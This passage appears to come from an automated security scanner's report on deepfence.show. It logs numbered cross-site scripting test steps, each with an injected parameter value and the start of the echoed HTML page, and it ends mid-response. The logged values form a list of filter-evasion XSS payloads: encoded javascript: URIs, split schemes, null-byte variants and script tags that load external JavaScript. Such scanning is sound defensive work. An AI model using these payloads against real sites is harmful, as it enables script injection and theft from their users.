href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #140\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=javascript:alert(String.fromCharCode(\n88,83,83))>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #141\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&\n#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&\n#40;&#39;&#88;&#83;&#83;&#39;&#41;>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #142\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io<IMG SRC=&#0000106&#0000097&#0000118&#0000097&\n#0000115&#0000099&#0000114&#0000105&#0000112&\n#0000116&#0000058&#0000097&#0000108&#0000101&\n#0000114&#0000116&#0000040&#0000039&#0000088&\n#0000083&#0000083&#0000039&#0000041>ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #143\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#\nx69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&\n#x27&#x58&#x53&#x53&#x27&#x29>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io not be echoed back in the response\nCWE-ID CWE-79\nIssue Number #144\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=\"jav ascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #145\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #146\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #147\nScan Cross Site ScriptingSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #148\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io perl -e 'print \"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";' >\nout\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #149\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io perl -e 'print \"<SCR\\0IPT>alert(\\\"XSS\\\")</SCR\\0IPT>\";' \n> out\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #150\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=\" &#14; javascript:alert('XSS');\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #151\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT/XSS SRC=\"http://soapui.org/xss.js\"></\nSCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #152\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #153\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT/SRC=\"http://soapui.org/xss.js\"></SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = 